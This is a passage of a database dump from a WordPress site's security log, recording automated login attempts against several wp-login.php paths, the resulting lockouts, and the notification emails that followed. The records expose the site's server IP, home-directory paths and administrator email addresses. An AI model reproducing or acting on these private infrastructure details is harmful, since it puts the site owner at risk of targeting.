15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLNViJ7D9Gn7wDPh8Y5gAAAMA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"81.0.120.26\";s:11:\"REMOTE_PORT\";s:5:\"51986\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLNViJ7D9Gn7wDPh8Y5gAAAMA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065781.4129\";s:12:\"REQUEST_TIME\";s:10:\"1569065781\";}}','notice','2019-09-21 11:36:22','2019-09-21 11:36:21',17794880,19285616,'https://bintara.com.my/wp/wp-login.php',1,0,'81.0.120.26'),(25665,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:36:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:36:21\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:51:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:51:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:36:22','2019-09-21 11:36:21',17879808,19285616,'https://bintara.com.my/wp/wp-login.php',1,0,'81.0.120.26'),(25666,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:36:22','2019-09-21 11:36:21',18085712,19285616,'https://bintara.com.my/wp/wp-login.php',1,0,'81.0.120.26'),(25667,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLRnkXpgmG5P@iB8kZLAAAAIw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.129.222.66\";s:11:\"REMOTE_PORT\";s:5:\"46586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLRnkXpgmG5P@iB8kZLAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065798.1896\";s:12:\"REQUEST_TIME\";s:10:\"1569065798\";}}','notice','2019-09-21 11:36:39','2019-09-21 11:36:38',17796816,19285296,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.129.222.66'),(25668,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:36:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:36:38\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:51:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:51:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:36:39','2019-09-21 11:36:38',17881376,19285296,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.129.222.66'),(25669,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:36:39','2019-09-21 11:36:38',18086976,19285296,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.129.222.66'),(25670,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLVDDrcQxTmGrCWuaMBwAAAdQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"35.200.239.78\";s:11:\"REMOTE_PORT\";s:5:\"34164\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLVDDrcQxTmGrCWuaMBwAAAdQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065812.3254\";s:12:\"REQUEST_TIME\";s:10:\"1569065812\";}}','notice','2019-09-21 11:36:54','2019-09-21 11:36:52',17797400,19287488,'https://bintara.com.my/test/wp-login.php',1,0,'35.200.239.78'),(25671,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:36:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:36:52\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:51:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:51:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:36:54','2019-09-21 11:36:52',17882120,19287488,'https://bintara.com.my/test/wp-login.php',1,0,'35.200.239.78'),(25672,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:36:54','2019-09-21 11:36:52',18087736,19287488,'https://bintara.com.my/test/wp-login.php',1,0,'35.200.239.78'),(25673,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLankXpgmG5P@iB8kZagAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"47.106.247.125\";s:11:\"REMOTE_PORT\";s:5:\"44624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLankXpgmG5P@iB8kZagAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569065834.334\";s:12:\"REQUEST_TIME\";s:10:\"1569065834\";}}','notice','2019-09-21 11:37:15','2019-09-21 11:37:14',17796872,19287856,'https://bintara.com.my/2019/wp-login.php',1,0,'47.106.247.125'),(25674,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:37:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:37:14\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:52:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:52:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:37:15','2019-09-21 11:37:14',17881760,19287856,'https://bintara.com.my/2019/wp-login.php',1,0,'47.106.247.125'),(25675,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:37:15','2019-09-21 11:37:14',18087400,19287856,'https://bintara.com.my/2019/wp-login.php',1,0,'47.106.247.125'),(25676,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLenkXpgmG5P@iB8kZgQAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"101.50.3.31\";s:11:\"REMOTE_PORT\";s:5:\"38544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLenkXpgmG5P@iB8kZgQAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1569065850.5\";s:12:\"REQUEST_TIME\";s:10:\"1569065850\";}}','notice','2019-09-21 11:37:32','2019-09-21 11:37:30',17797344,19287776,'https://bintara.com.my/blog/wp-login.php',1,0,'101.50.3.31'),(25677,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:37:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:37:30\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:52:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:52:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:37:32','2019-09-21 11:37:30',17881960,19287776,'https://bintara.com.my/blog/wp-login.php',1,0,'101.50.3.31'),(25678,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:37:32','2019-09-21 11:37:30',18087608,19287776,'https://bintara.com.my/blog/wp-login.php',1,0,'101.50.3.31'),(25679,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLpnkXpgmG5P@iB8kZzQAAAJE\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"81.0.120.26\";s:11:\"REMOTE_PORT\";s:5:\"49906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLpnkXpgmG5P@iB8kZzQAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065894.4703\";s:12:\"REQUEST_TIME\";s:10:\"1569065894\";}}','notice','2019-09-21 11:38:16','2019-09-21 11:38:14',17799816,19290280,'https://bintara.com.my/wp/wp-login.php',1,0,'81.0.120.26'),(25680,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:38:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:38:14\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:53:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:53:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:38:16','2019-09-21 11:38:14',17884432,19290280,'https://bintara.com.my/wp/wp-login.php',1,0,'81.0.120.26'),(25681,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:38:16','2019-09-21 